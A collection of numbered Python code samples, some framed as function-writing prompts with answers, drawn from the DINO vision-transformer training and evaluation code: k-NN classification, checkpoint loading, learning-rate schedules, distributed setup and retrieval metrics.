    test_features = extract_features(model, data_loader_val, args.use_cuda)

    if utils.get_rank() == 0:
        # L2-normalize so dot products in the k-NN classifier become cosine similarities
        train_features = nn.functional.normalize(train_features, dim=1, p=2)
        test_features = nn.functional.normalize(test_features, dim=1, p=2)

    train_labels = torch.tensor([s[-1] for s in dataset_train.samples]).long()
    test_labels = torch.tensor([s[-1] for s in dataset_val.samples]).long()

    # save features and labels
    # NOTE(review): rank is checked via utils.get_rank() above but dist.get_rank() here —
    # confirm both refer to the same process group.
    if args.dump_features and dist.get_rank() == 0:
        torch.save(train_features.cpu(), os.path.join(args.dump_features, "trainfeat.pth"))
        torch.save(test_features.cpu(), os.path.join(args.dump_features, "testfeat.pth"))
        torch.save(train_labels.cpu(), os.path.join(args.dump_features, "trainlabels.pth"))
        torch.save(test_labels.cpu(), os.path.join(args.dump_features, "testlabels.pth"))
    return train_features, test_features, train_labels, test_labels
161,710 | import os
import sys
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import datasets
from torchvision import transforms as pth_transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
def knn_classifier(train_features, train_labels, test_features, test_labels, k, T, num_classes=1000):
    """Weighted k-NN classification (DINO evaluation protocol).

    Args:
        train_features: (num_train, dim) feature bank.
        train_labels: (num_train,) integer labels for the bank.
        test_features: (num_test, dim) query features.
        test_labels: (num_test,) ground-truth labels for the queries.
        k: number of neighbors that vote.
        T: softmax temperature applied to neighbor similarities.
        num_classes: size of the label space.

    Returns:
        (top1, top5) accuracy percentages; top5 degrades to top-min(5, k)
        when fewer than 5 neighbors are retrieved.
    """
    top1, top5, total = 0.0, 0.0, 0
    train_features = train_features.t()
    num_test_images, num_chunks = test_labels.shape[0], 100
    # bug fix: with fewer than `num_chunks` test images the original computed a
    # chunk size of 0 and `range(0, n, 0)` raised ValueError
    imgs_per_chunk = max(num_test_images // num_chunks, 1)
    retrieval_one_hot = torch.zeros(k, num_classes).to(train_features.device)
    for idx in range(0, num_test_images, imgs_per_chunk):
        # get the features for test images
        features = test_features[
            idx : min((idx + imgs_per_chunk), num_test_images), :
        ]
        targets = test_labels[idx : min((idx + imgs_per_chunk), num_test_images)]
        batch_size = targets.shape[0]

        # calculate the dot product and compute top-k neighbors
        similarity = torch.mm(features, train_features)
        distances, indices = similarity.topk(k, largest=True, sorted=True)
        candidates = train_labels.view(1, -1).expand(batch_size, -1)
        retrieved_neighbors = torch.gather(candidates, 1, indices)

        # one-hot encode neighbor labels and weight each vote by exp(similarity / T)
        retrieval_one_hot.resize_(batch_size * k, num_classes).zero_()
        retrieval_one_hot.scatter_(1, retrieved_neighbors.view(-1, 1), 1)
        distances_transform = distances.clone().div_(T).exp_()
        probs = torch.sum(
            torch.mul(
                retrieval_one_hot.view(batch_size, -1, num_classes),
                distances_transform.view(batch_size, -1, 1),
            ),
            1,
        )
        _, predictions = probs.sort(1, True)

        # find the predictions that match the target
        correct = predictions.eq(targets.data.view(-1, 1))
        top1 = top1 + correct.narrow(1, 0, 1).sum().item()
        top5 = top5 + correct.narrow(1, 0, min(5, k)).sum().item()  # top5 does not make sense if k < 5
        total += targets.size(0)
    top1 = top1 * 100.0 / total
    top5 = top5 * 100.0 / total
    return top1, top5
161,711 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def load_pretrained_weights(model, pretrained_weights, checkpoint_key, model_name, patch_size):
    """Load DINO pretrained weights into `model`.

    If `pretrained_weights` is an existing file, loads that checkpoint
    (optionally unwrapping `checkpoint_key`, e.g. 'teacher') non-strictly
    after stripping DDP/multicrop prefixes. Otherwise falls back to
    downloading the reference DINO checkpoint matching
    (model_name, patch_size), or leaves the model's random weights when no
    reference exists.
    """
    if os.path.isfile(pretrained_weights):
        state_dict = torch.load(pretrained_weights, map_location="cpu")
        if checkpoint_key is not None and checkpoint_key in state_dict:
            print(f"Take key {checkpoint_key} in provided checkpoint dict")
            state_dict = state_dict[checkpoint_key]
        # remove `module.` prefix
        state_dict = {k.replace("module.", ""): v for k, v in state_dict.items()}
        # remove `backbone.` prefix induced by multicrop wrapper
        state_dict = {k.replace("backbone.", ""): v for k, v in state_dict.items()}
        # strict=False: tolerate missing/unexpected keys (e.g. projection heads)
        msg = model.load_state_dict(state_dict, strict=False)
        print('Pretrained weights found at {} and loaded with msg: {}'.format(pretrained_weights, msg))
    else:
        print("Please use the `--pretrained_weights` argument to indicate the path of the checkpoint to evaluate.")
        # map (architecture, patch size) to the reference checkpoint path
        url = None
        if model_name == "vit_small" and patch_size == 16:
            url = "dino_deitsmall16_pretrain/dino_deitsmall16_pretrain.pth"
        elif model_name == "vit_small" and patch_size == 8:
            url = "dino_deitsmall8_pretrain/dino_deitsmall8_pretrain.pth"
        elif model_name == "vit_base" and patch_size == 16:
            url = "dino_vitbase16_pretrain/dino_vitbase16_pretrain.pth"
        elif model_name == "vit_base" and patch_size == 8:
            url = "dino_vitbase8_pretrain/dino_vitbase8_pretrain.pth"
        elif model_name == "xcit_small_12_p16":
            url = "dino_xcit_small_12_p16_pretrain/dino_xcit_small_12_p16_pretrain.pth"
        elif model_name == "xcit_small_12_p8":
            url = "dino_xcit_small_12_p8_pretrain/dino_xcit_small_12_p8_pretrain.pth"
        elif model_name == "xcit_medium_24_p16":
            url = "dino_xcit_medium_24_p16_pretrain/dino_xcit_medium_24_p16_pretrain.pth"
        elif model_name == "xcit_medium_24_p8":
            url = "dino_xcit_medium_24_p8_pretrain/dino_xcit_medium_24_p8_pretrain.pth"
        elif model_name == "resnet50":
            url = "dino_resnet50_pretrain/dino_resnet50_pretrain.pth"
        if url is not None:
            print("Since no pretrained weights have been provided, we load the reference pretrained DINO weights.")
            state_dict = torch.hub.load_state_dict_from_url(url="https://dl.fbaipublicfiles.com/dino/" + url)
            model.load_state_dict(state_dict, strict=True)
        else:
            print("There is no reference weights available for this model => We use random weights.")
161,712 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def load_pretrained_linear_weights(linear_classifier, model_name, patch_size):
    """Load the official DINO linear-probe weights for (model_name, patch_size).

    When no reference checkpoint exists for the requested architecture, the
    classifier keeps its random initialization.
    """
    vit_checkpoints = {
        ("vit_small", 16): "dino_deitsmall16_pretrain/dino_deitsmall16_linearweights.pth",
        ("vit_small", 8): "dino_deitsmall8_pretrain/dino_deitsmall8_linearweights.pth",
        ("vit_base", 16): "dino_vitbase16_pretrain/dino_vitbase16_linearweights.pth",
        ("vit_base", 8): "dino_vitbase8_pretrain/dino_vitbase8_linearweights.pth",
    }
    url = vit_checkpoints.get((model_name, patch_size))
    if url is None and model_name == "resnet50":
        # resnet50 has a single reference checkpoint, independent of patch_size
        url = "dino_resnet50_pretrain/dino_resnet50_linearweights.pth"
    if url is None:
        print("We use random linear weights.")
        return
    print("We load the reference pretrained linear weights.")
    state_dict = torch.hub.load_state_dict_from_url(url="https://dl.fbaipublicfiles.com/dino/" + url)["state_dict"]
    linear_classifier.load_state_dict(state_dict, strict=True)
161,713 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def clip_gradients(model, clip):
    """Clip each parameter's gradient to an L2 norm of at most `clip`.

    Clipping is applied per parameter (not over the global gradient vector),
    in place. Returns the list of pre-clipping gradient norms for logging.
    """
    grad_norms = []
    eps = 1e-6  # guards the division when a gradient is exactly zero
    for _, param in model.named_parameters():
        grad = param.grad
        if grad is None:
            continue
        norm = grad.data.norm(2)
        grad_norms.append(norm.item())
        scale = clip / (norm + eps)
        if scale < 1:
            grad.data.mul_(scale)
    return grad_norms
161,714 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def cancel_gradients_last_layer(epoch, model, freeze_last_layer):
    """Drop gradients of every parameter whose name contains "last_layer"
    during the first `freeze_last_layer` epochs, effectively freezing it."""
    if epoch < freeze_last_layer:
        for name, param in model.named_parameters():
            if "last_layer" in name:
                param.grad = None
161,715 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `restart_from_checkpoint` function. Write a Python function `def restart_from_checkpoint(ckp_path, run_variables=None, **kwargs)` to solve the following problem:
Re-start from checkpoint
Here is the function:
def restart_from_checkpoint(ckp_path, run_variables=None, **kwargs):
    """
    Re-start from checkpoint

    For each keyword argument (e.g. state_dict=model, optimizer=opt), looks up
    the same key in the checkpoint file and loads it into that object via
    load_state_dict. Scalars listed in `run_variables` (e.g. {"epoch": 0}) are
    overwritten in place from the checkpoint. Returns silently when `ckp_path`
    does not exist.
    """
    if not os.path.isfile(ckp_path):
        return
    print("Found checkpoint at {}".format(ckp_path))
    # open checkpoint file
    checkpoint = torch.load(ckp_path, map_location="cpu")
    # key is what to look for in the checkpoint file
    # value is the object to load
    # example: {'state_dict': model}
    for key, value in kwargs.items():
        if key in checkpoint and value is not None:
            try:
                # tolerant load first: ignores missing/unexpected keys on modules
                msg = value.load_state_dict(checkpoint[key], strict=False)
                print("=> loaded '{}' from checkpoint '{}' with msg {}".format(key, ckp_path, msg))
            except TypeError:
                # optimizers/schedulers do not accept a `strict` argument
                try:
                    msg = value.load_state_dict(checkpoint[key])
                    print("=> loaded '{}' from checkpoint: '{}'".format(key, ckp_path))
                except ValueError:
                    print("=> failed to load '{}' from checkpoint: '{}'".format(key, ckp_path))
        else:
            print("=> key '{}' not found in checkpoint: '{}'".format(key, ckp_path))
    # re load variable important for the run
    if run_variables is not None:
        for var_name in run_variables:
            if var_name in checkpoint:
                run_variables[var_name] = checkpoint[var_name]
161,716 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def cosine_scheduler(base_value, final_value, epochs, niter_per_ep, warmup_epochs=0, start_warmup_value=0):
    """Per-iteration schedule: optional linear warmup from `start_warmup_value`
    to `base_value`, then half-cosine decay from `base_value` to `final_value`.

    Returns a numpy array of length epochs * niter_per_ep.
    """
    total_iters = epochs * niter_per_ep
    warmup_iters = warmup_epochs * niter_per_ep
    if warmup_epochs > 0:
        warmup = np.linspace(start_warmup_value, base_value, warmup_iters)
    else:
        warmup = np.array([])
    decay_steps = np.arange(total_iters - warmup_iters)
    cosine = final_value + 0.5 * (base_value - final_value) * (1 + np.cos(np.pi * decay_steps / len(decay_steps)))
    schedule = np.concatenate((warmup, cosine))
    assert len(schedule) == total_iters
    return schedule
161,717 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `bool_flag` function. Write a Python function `def bool_flag(s)` to solve the following problem:
Parse boolean arguments from the command line.
Here is the function:
def bool_flag(s):
    """
    Parse boolean arguments from the command line.

    Accepts (case-insensitively) "on"/"true"/"1" -> True and
    "off"/"false"/"0" -> False; anything else raises
    argparse.ArgumentTypeError so argparse reports a clean usage error.
    """
    # Local import: `argparse` is not among this module's visible imports, so
    # without it the raise below would fail with a NameError instead of the
    # intended ArgumentTypeError.
    import argparse

    FALSY_STRINGS = {"off", "false", "0"}
    TRUTHY_STRINGS = {"on", "true", "1"}
    value = s.lower()  # lower-case once instead of per branch
    if value in FALSY_STRINGS:
        return False
    if value in TRUTHY_STRINGS:
        return True
    raise argparse.ArgumentTypeError("invalid value for a boolean flag")
161,718 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `fix_random_seeds` function. Write a Python function `def fix_random_seeds(seed=31)` to solve the following problem:
Fix random seeds.
Here is the function:
def fix_random_seeds(seed=31):
    """
    Fix random seeds.

    Seeds the torch CPU RNG, every CUDA device RNG, and numpy's global RNG
    so runs are reproducible.
    """
    for seed_fn in (torch.manual_seed, torch.cuda.manual_seed_all, np.random.seed):
        seed_fn(seed)
161,719 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def get_world_size():
    # Number of distributed processes; falls back to 1 when torch.distributed
    # is unavailable/uninitialized (is_dist_avail_and_initialized is defined
    # elsewhere in this module).
    if not is_dist_avail_and_initialized():
        return 1
    return dist.get_world_size()
The provided code snippet includes necessary dependencies for implementing the `reduce_dict` function. Write a Python function `def reduce_dict(input_dict, average=True)` to solve the following problem:
Args: input_dict (dict): all the values will be reduced average (bool): whether to do average or sum Reduce the values in the dictionary from all processes so that all processes have the averaged results. Returns a dict with the same fields as input_dict, after reduction.
Here is the function:
def reduce_dict(input_dict, average=True):
    """
    Args:
        input_dict (dict): all the values will be reduced
        average (bool): whether to do average or sum
    Reduce the values in the dictionary from all processes so that all processes
    have the averaged results. Returns a dict with the same fields as
    input_dict, after reduction.

    NOTE(review): values are stacked with torch.stack, so they are assumed to
    be same-shape tensors (typically 0-dim losses/metrics) — confirm at call
    sites.
    """
    world_size = get_world_size()
    # Single-process run: nothing to reduce, return the input untouched.
    if world_size < 2:
        return input_dict
    with torch.no_grad():
        names = []
        values = []
        # sort the keys so that they are consistent across processes
        for k in sorted(input_dict.keys()):
            names.append(k)
            values.append(input_dict[k])
        # One all_reduce over a stacked tensor instead of one call per entry.
        values = torch.stack(values, dim=0)
        dist.all_reduce(values)
        if average:
            values /= world_size
        reduced_dict = {k: v for k, v in zip(names, values)}
    return reduced_dict
161,720 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def get_sha():
    """Return a one-line summary of the git state of this source tree:
    commit sha, dirty/clean status, and branch name. Any git failure
    (not a repo, git missing, ...) degrades gracefully to placeholders."""
    repo_dir = os.path.dirname(os.path.abspath(__file__))

    def _git(*cmd):
        return subprocess.check_output(list(cmd), cwd=repo_dir).decode('ascii').strip()

    sha, diff, branch = 'N/A', "clean", 'N/A'
    try:
        sha = _git('git', 'rev-parse', 'HEAD')
        # refresh the index so diff-index below reports accurately
        subprocess.check_output(['git', 'diff'], cwd=repo_dir)
        diff = "has uncommited changes" if _git('git', 'diff-index', 'HEAD') else "clean"
        branch = _git('git', 'rev-parse', '--abbrev-ref', 'HEAD')
    except Exception:
        pass
    return f"sha: {sha}, status: {diff}, branch: {branch}"
161,721 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def is_main_process():
    # True only on global rank 0 (get_rank is defined elsewhere in this module).
    return get_rank() == 0
def save_on_master(*args, **kwargs):
    # torch.save that is a no-op on non-master ranks, so a multi-process job
    # writes each checkpoint exactly once.
    if is_main_process():
        torch.save(*args, **kwargs)
161,722 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def setup_for_distributed(is_master):
    """
    This function disables printing when not in master process

    Replaces the builtin print with a wrapper that only emits on the master
    rank, unless the caller passes force=True.
    """
    import builtins as __builtin__
    builtin_print = __builtin__.print
    def print(*args, **kwargs):
        # `force` is consumed here so it never reaches the real print
        force = kwargs.pop('force', False)
        if is_master or force:
            builtin_print(*args, **kwargs)
    __builtin__.print = print
def init_distributed_mode(args):
    """Initialize torch.distributed from whatever launcher started us and
    mutate `args` with rank/gpu/world_size. Exits if no GPU is available."""
    # launched with torch.distributed.launch
    if 'RANK' in os.environ and 'WORLD_SIZE' in os.environ:
        args.rank = int(os.environ["RANK"])
        args.world_size = int(os.environ['WORLD_SIZE'])
        args.gpu = int(os.environ['LOCAL_RANK'])
    # launched with submitit on a slurm cluster
    elif 'SLURM_PROCID' in os.environ:
        args.rank = int(os.environ['SLURM_PROCID'])
        args.gpu = args.rank % torch.cuda.device_count()
    # launched naively with `python main_dino.py`
    # we manually add MASTER_ADDR and MASTER_PORT to env variables
    elif torch.cuda.is_available():
        print('Will run the code on one GPU.')
        args.rank, args.gpu, args.world_size = 0, 0, 1
        os.environ['MASTER_ADDR'] = '127.0.0.1'
        os.environ['MASTER_PORT'] = '29500'
    else:
        print('Does not support training without GPU.')
        sys.exit(1)
    dist.init_process_group(
        backend="nccl",
        init_method=args.dist_url,
        world_size=args.world_size,
        rank=args.rank,
    )
    # pin this process to its GPU before any collective runs
    torch.cuda.set_device(args.gpu)
    print('| distributed init (rank {}): {}'.format(
        args.rank, args.dist_url), flush=True)
    dist.barrier()
    setup_for_distributed(args.rank == 0)
161,723 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
The provided code snippet includes necessary dependencies for implementing the `accuracy` function. Write a Python function `def accuracy(output, target, topk=(1,))` to solve the following problem:
Computes the accuracy over the k top predictions for the specified values of k
Here is the function:
def accuracy(output, target, topk=(1,)):
    """Computes the accuracy over the k top predictions for the specified values of k.

    Returns one tensor per requested k, each holding the top-k accuracy in
    percent over the batch.
    """
    maxk = max(topk)
    batch_size = target.size(0)
    _, top_pred = output.topk(maxk, 1, True, True)
    top_pred = top_pred.t()  # shape (maxk, batch) so hits[:k] selects top-k rows
    hits = top_pred.eq(target.reshape(1, -1).expand_as(top_pred))
    results = []
    for k in topk:
        correct_k = hits[:k].reshape(-1).float().sum(0)
        results.append(correct_k * 100. / batch_size)
    return results
161,724 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def _no_grad_trunc_normal_(tensor, mean, std, a, b):
    """Fill `tensor` in place with values drawn from a normal(mean, std)
    truncated to [a, b], via inverse-CDF sampling. Returns `tensor`."""
    # Cut & paste from PyTorch official master until it's in a few official releases - RW
    # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf
    def norm_cdf(x):
        # Computes standard normal cumulative distribution function
        return (1. + math.erf(x / math.sqrt(2.))) / 2.

    if (mean < a - 2 * std) or (mean > b + 2 * std):
        # Local import: `warnings` is not among this module's visible imports,
        # so referencing it unqualified would raise NameError on this path.
        import warnings
        warnings.warn("mean is more than 2 std from [a, b] in nn.init.trunc_normal_. "
                      "The distribution of values may be incorrect.",
                      stacklevel=2)

    with torch.no_grad():
        # Values are generated by using a truncated uniform distribution and
        # then using the inverse CDF for the normal distribution.
        # Get upper and lower cdf values
        l = norm_cdf((a - mean) / std)
        u = norm_cdf((b - mean) / std)
        # Uniformly fill tensor with values from [l, u], then translate to
        # [2l-1, 2u-1].
        tensor.uniform_(2 * l - 1, 2 * u - 1)
        # Use inverse cdf transform for normal distribution to get truncated
        # standard normal
        tensor.erfinv_()
        # Transform to proper mean, std
        tensor.mul_(std * math.sqrt(2.))
        tensor.add_(mean)
        # Clamp to ensure it's in the proper range
        tensor.clamp_(min=a, max=b)
        return tensor


def trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.):
    # type: (Tensor, float, float, float, float) -> Tensor
    """In-place truncated-normal init, same contract as nn.init.trunc_normal_."""
    return _no_grad_trunc_normal_(tensor, mean, std, a, b)
161,725 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def get_params_groups(model):
    """Split trainable parameters into two optimizer groups: weights (to be
    weight-decayed by the optimizer default) and biases/norm parameters
    (weight_decay forced to 0)."""
    decay, no_decay = [], []
    for name, param in model.named_parameters():
        if not param.requires_grad:
            continue
        # we do not regularize biases nor Norm parameters (1-D tensors)
        is_bias_or_norm = name.endswith(".bias") or len(param.shape) == 1
        (no_decay if is_bias_or_norm else decay).append(param)
    return [{'params': decay}, {'params': no_decay, 'weight_decay': 0.}]
161,726 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def has_batchnorms(model):
    """Return True if `model` contains any batch-norm (or SyncBatchNorm)
    submodule, else False.

    The original fell off the end and returned None for the no-match case;
    `any` makes the result an explicit bool while keeping identical
    truthiness for existing callers.
    """
    bn_types = (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d, nn.SyncBatchNorm)
    return any(isinstance(module, bn_types) for _, module in model.named_modules())
161,727 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def compute_ap(ranks, nres):
    """
    Computes average precision for given ranked indexes.
    Arguments
    ---------
    ranks : zero-based ranks of positive images
    nres : number of positive images
    Returns
    -------
    ap : average precision
    """
    num_ranked = len(ranks)  # positives actually returned by the system
    recall_step = 1. / nres
    ap = 0
    # trapezoidal integration of the precision-recall curve
    for j in np.arange(num_ranked):
        rank = ranks[j]
        precision_before = 1. if rank == 0 else float(j) / rank
        precision_after = float(j + 1) / (rank + 1)
        ap += (precision_before + precision_after) * recall_step / 2.
    return ap
The provided code snippet includes necessary dependencies for implementing the `compute_map` function. Write a Python function `def compute_map(ranks, gnd, kappas=[])` to solve the following problem:
Computes the mAP for a given set of returned results. Usage: map = compute_map (ranks, gnd) computes mean average precision (map) only map, aps, pr, prs = compute_map (ranks, gnd, kappas) computes mean average precision (map), average precision (aps) for each query computes mean precision at kappas (pr), precision at kappas (prs) for each query Notes: 1) ranks starts from 0, ranks.shape = db_size X #queries 2) The junk results (e.g., the query itself) should be declared in the gnd struct array 3) If there are no positive images for some query, that query is excluded from the evaluation
Here is the function:
def compute_map(ranks, gnd, kappas=[]):
    """
    Computes the mAP for a given set of returned results.
    Usage:
        map = compute_map (ranks, gnd)
            computes mean average precision (map) only
        map, aps, pr, prs = compute_map (ranks, gnd, kappas)
            computes mean average precision (map), average precision (aps) for each query
            computes mean precision at kappas (pr), precision at kappas (prs) for each query
    Notes:
        1) ranks starts from 0, ranks.shape = db_size X #queries
        2) The junk results (e.g., the query itself) should be declared in the gnd struct array
        3) If there are no positive images for some query, that query is excluded from the evaluation

    NOTE(review): `map` shadows the builtin, `kappas=[]` is a mutable default
    (read-only here, so harmless), and the bare `except` below swallows any
    error while reading gnd[i]['junk'] — left as-is to preserve behavior.
    """
    map = 0.
    nq = len(gnd) # number of queries
    aps = np.zeros(nq)
    pr = np.zeros(len(kappas))
    prs = np.zeros((nq, len(kappas)))
    nempty = 0
    for i in np.arange(nq):
        qgnd = np.array(gnd[i]['ok'])
        # no positive images, skip from the average
        if qgnd.shape[0] == 0:
            aps[i] = float('nan')
            prs[i, :] = float('nan')
            nempty += 1
            continue
        try:
            qgndj = np.array(gnd[i]['junk'])
        except:
            qgndj = np.empty(0)
        # sorted positions of positive and junk images (0 based)
        pos = np.arange(ranks.shape[0])[np.in1d(ranks[:,i], qgnd)]
        junk = np.arange(ranks.shape[0])[np.in1d(ranks[:,i], qgndj)]
        k = 0;
        ij = 0;
        if len(junk):
            # decrease positions of positives based on the number of
            # junk images appearing before them
            ip = 0
            while (ip < len(pos)):
                while (ij < len(junk) and pos[ip] > junk[ij]):
                    k += 1
                    ij += 1
                # k junk results precede this positive; shift its rank up
                pos[ip] = pos[ip] - k
                ip += 1
        # compute ap
        ap = compute_ap(pos, len(qgnd))
        map = map + ap
        aps[i] = ap
        # compute precision @ k
        pos += 1 # get it to 1-based
        for j in np.arange(len(kappas)):
            # cap kappa at the deepest positive so precision@k stays defined
            kq = min(max(pos), kappas[j]);
            prs[i, j] = (pos <= kq).sum() / kq
        pr = pr + prs[i, :]
    # average over queries that actually have positives
    map = map / (nq - nempty)
    pr = pr / (nq - nempty)
    return map, aps, pr, prs
161,728 | import os
import sys
import time
import math
import random
import datetime
import subprocess
from collections import defaultdict, deque
import numpy as np
import torch
from torch import nn
import torch.distributed as dist
from PIL import ImageFilter, ImageOps
def multi_scale(samples, model):
    """Average the model's features over three input scales (1, 1/sqrt(2), 1/2)
    and L2-normalize the result."""
    accumulated = None
    for scale in (1, 1/2**(1/2), 1/2):  # we use 3 different scales
        if scale == 1:
            inp = samples.clone()
        else:
            inp = nn.functional.interpolate(samples, scale_factor=scale, mode='bilinear', align_corners=False)
        feats = model(inp).clone()
        accumulated = feats if accumulated is None else accumulated + feats
    accumulated /= 3
    accumulated /= accumulated.norm()
    return accumulated
161,729 | import argparse
import os
import uuid
from pathlib import Path
import main_dino
import submitit
def parse_args():
    """Parse DINO training arguments extended with submitit cluster options."""
    parser = argparse.ArgumentParser("Submitit for DINO", parents=[main_dino.get_args_parser()])
    cluster_flags = [
        ("--ngpus", dict(default=8, type=int, help="Number of gpus to request on each node")),
        ("--nodes", dict(default=2, type=int, help="Number of nodes to request")),
        ("--timeout", dict(default=2800, type=int, help="Duration of the job")),
        ("--partition", dict(default="learnfair", type=str, help="Partition where to submit")),
        ("--use_volta32", dict(action='store_true', help="Big models? Use this")),
        ("--comment", dict(default="", type=str,
                           help='Comment to pass to scheduler, e.g. priority message')),
    ]
    for flag, options in cluster_flags:
        parser.add_argument(flag, **options)
    return parser.parse_args()
161,730 | import argparse
import os
import uuid
from pathlib import Path
import main_dino
import submitit
def get_shared_folder() -> Path:
    """Return (creating if needed) the per-user experiments directory under
    the cluster's shared /checkpoint mount; raise if the mount is absent."""
    if not Path("/checkpoint/").is_dir():
        raise RuntimeError("No shared folder available")
    user = os.getenv("USER")
    shared = Path(f"/checkpoint/{user}/experiments")
    shared.mkdir(exist_ok=True)
    return shared


def get_init_file():
    """Return a unique, not-yet-existing init-file path in the shared folder."""
    # Init file must not exist, but it's parent dir must exist.
    os.makedirs(str(get_shared_folder()), exist_ok=True)
    init_file = get_shared_folder() / f"{uuid.uuid4().hex}_init"
    if init_file.exists():
        os.remove(str(init_file))
    return init_file
161,731 | import os
import sys
import argparse
import cv2
import random
import colorsys
import requests
from io import BytesIO
import skimage.io
from skimage.measure import find_contours
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
import torch
import torch.nn as nn
import torchvision
from torchvision import transforms as pth_transforms
import numpy as np
from PIL import Image
import utils
import vision_transformer as vits
def apply_mask(image, mask, color, alpha=0.5):
    """Alpha-blend `color` (RGB in [0, 1]) into `image` wherever `mask` is set,
    modifying and returning `image`."""
    keep = 1 - alpha * mask       # weight of the original pixel
    overlay = alpha * mask        # weight of the overlay color
    for channel in range(3):
        image[:, :, channel] = image[:, :, channel] * keep + overlay * color[channel] * 255
    return image
def random_colors(N, bright=True):
    """
    Generate random colors.

    Produces N visually distinct RGB tuples by spacing hues evenly in HSV
    space, then shuffling their order (uses the global `random` state).
    """
    value = 1.0 if bright else 0.7
    rgb = [colorsys.hsv_to_rgb(i / N, 1, value) for i in range(N)]
    random.shuffle(rgb)
    return rgb
def display_instances(image, mask, fname="test", figsize=(5, 5), blur=False, contour=True, alpha=0.5):
    """Overlay a single binary `mask` on `image` with a random color, optionally
    drawing its contour polygons, and save the figure to `fname`.

    NOTE(review): assumes `image` is HxWx3 and `mask` HxW — confirm at call sites.
    """
    fig = plt.figure(figsize=figsize, frameon=False)
    ax = plt.Axes(fig, [0., 0., 1., 1.])
    ax.set_axis_off()
    fig.add_axes(ax)
    ax = plt.gca()
    # single instance; kept as a loop for parity with multi-instance variants
    N = 1
    mask = mask[None, :, :]
    # Generate random colors
    colors = random_colors(N)
    # Show area outside image boundaries.
    height, width = image.shape[:2]
    margin = 0
    ax.set_ylim(height + margin, -margin)
    ax.set_xlim(-margin, width + margin)
    ax.axis('off')
    masked_image = image.astype(np.uint32).copy()
    for i in range(N):
        color = colors[i]
        _mask = mask[i]
        if blur:
            # soften the mask edges before blending
            _mask = cv2.blur(_mask,(10,10))
        # Mask
        masked_image = apply_mask(masked_image, _mask, color, alpha)
        # Mask Polygon
        # Pad to ensure proper polygons for masks that touch image edges.
        if contour:
            padded_mask = np.zeros((_mask.shape[0] + 2, _mask.shape[1] + 2))
            padded_mask[1:-1, 1:-1] = _mask
            contours = find_contours(padded_mask, 0.5)
            for verts in contours:
                # Subtract the padding and flip (y, x) to (x, y)
                verts = np.fliplr(verts) - 1
                p = Polygon(verts, facecolor="none", edgecolor=color)
                ax.add_patch(p)
    ax.imshow(masked_image.astype(np.uint8), aspect='auto')
    fig.savefig(fname)
    print(f"{fname} saved.")
    return
161,732 | import os
import argparse
import json
from pathlib import Path
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import datasets
from torchvision import transforms as pth_transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
def train(model, linear_classifier, optimizer, loader, epoch, n, avgpool):
    """Train the linear classifier for one epoch on features from the frozen
    backbone `model` (its forward runs under torch.no_grad).

    `n` is the number of last ViT blocks whose [CLS] tokens are concatenated;
    `avgpool` additionally concatenates the mean of the last block's patch
    tokens. Returns a dict of metric-name -> epoch global average.

    NOTE(review): reads the module-level `args` (args.arch) instead of taking
    it as a parameter — confirm `args` is set globally before calling.
    """
